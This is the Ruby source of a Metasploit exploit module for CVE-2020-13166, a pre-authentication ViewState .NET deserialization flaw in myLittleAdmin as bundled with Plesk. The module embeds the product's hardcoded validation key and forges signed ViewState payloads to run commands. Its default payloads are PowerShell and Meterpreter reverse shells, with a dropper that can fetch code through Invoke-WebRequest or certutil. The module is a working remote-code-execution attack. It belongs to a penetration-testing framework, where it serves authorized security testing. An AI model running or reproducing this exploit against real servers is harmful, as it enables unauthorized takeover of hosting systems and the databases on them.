# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
# <input type="hidden" name="__VIEWSTATEGENERATOR"
id="__VIEWSTATEGENERATOR" value="CA0B0334" />
VIEWSTATE_GENERATOR = 'CA0B0334'.freeze
# <machineKey
#
validationKey="5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33E77E0628B17AA928039BF"
#
decryptionKey="DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4"
# validation="SHA1" />
VIEWSTATE_VALIDATION_KEY =
"\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf"
\
"\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a"
\
"\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e"
\
"\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::ViewState
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Plesk/myLittleAdmin ViewState .NET
Deserialization',
'Description' => %q{
This module exploits a ViewState .NET deserialization vulnerability
in
web-based MS SQL Server management tool myLittleAdmin, for version
3.8
and likely older versions, due to hardcoded <machineKey>
parameters in
the web.config file for ASP.NET.
Popular web hosting control panel Plesk offers myLittleAdmin as
an
optional component that is selected automatically during "full"
installation. This exploit caters to the Plesk target, though
it
should work fine against a standalone myLittleAdmin setup.
Successful exploitation results in code execution as the user
running
myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described
as
the "SQL Admin MSSQL anonymous account."
Tested on the latest Plesk Obsidian with optional myLittleAdmin
3.8.
},
'Author' => [
# Reported to SecuriTeam SSD by an anonymous researcher
# Reference exploit written by said anonymous researcher
# Publicly disclosed by Noam Rathaus of SecuriTeam's SSD
'Spencer McIntyre', # Inspiration
'wvu' # Module
],
'References' => [
['CVE', '2020-13166'],
['URL',
'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'],
['URL',
'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw']
],
'DisclosureDate' => '2020-05-15', # SecuriTeam SSD advisory
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
[
'Windows Command',
'Arch' => ARCH_CMD,
'Type' => :win_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
}
],
[
'Windows Dropper',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper,
'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
],
[
'PowerShell Stager',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
]
],
'DefaultTarget' => 2,
'DefaultOptions' => {
'SSL' => true,
'WfsDelay' => 10 # First exploit attempt may be a little
slow
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(8401, true, 'The myLittleAdmin port (default for
Plesk!)'),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
# XXX:
https://github.com/rapid7/metasploit-framework/issues/12963
import_target_defaults
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
unless res
return CheckCode::Unknown('Target did not respond to check
request.')
end
unless res.code == 200 && res.body.include?('myLittleAdmin
for SQL Server')
return CheckCode::Unknown('Target is not running
myLittleAdmin.')
end
vprint_good("myLittleAdmin is running at #{full_uri}")
check_viewstate(res.get_html_document)
end
def check_viewstate(html)
viewstate = html.at('//input[@id =
"__VIEWSTATE"]/@value')&.text
unless viewstate
return CheckCode::Detected("__VIEWSTATE not found, can't complete
check.")
end
@viewstate_generator =
html.at('//input[@id =
"__VIEWSTATEGENERATOR"]/@value')&.text
unless @viewstate_generator
print_warning('__VIEWSTATEGENERATOR not found, using known default
value')
@viewstate_generator = VIEWSTATE_GENERATOR
end
# ViewState generator needs to be a packed integer now
@viewstate_generator =
[@viewstate_generator.to_i(16)].pack('V')
we_can_sign_viewstate = can_sign_viewstate?(
viewstate,
extra: @viewstate_generator,
key: VIEWSTATE_VALIDATION_KEY
)
if we_can_sign_viewstate
return CheckCode::Vulnerable('We can sign our own ViewState.')
end
CheckCode::Safe("We can't sign our own ViewState.")
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :win_cmd
execute_command(payload.encoded)
when :win_dropper
execute_cmdstager
when :psh_stager
execute_command(cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
))
end
end
def execute_command(cmd, _opts = {})
vprint_status("Serializing command: #{cmd}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
# This is the only parameter we need for successful
exploitation!
'__VIEWSTATE' => generate_viewstate_payload(
cmd,
extra: @viewstate_generator,
key: VIEWSTATE_VALIDATION_KEY
)
}
)
unless res && res.code == 302 && res.redirection.path ==
'/error/index.html'
fail_with(Failure::PayloadFailed, "Could not execute command:
#{cmd}")
end
print_good("Successfully executed command: #{cmd}")
end
end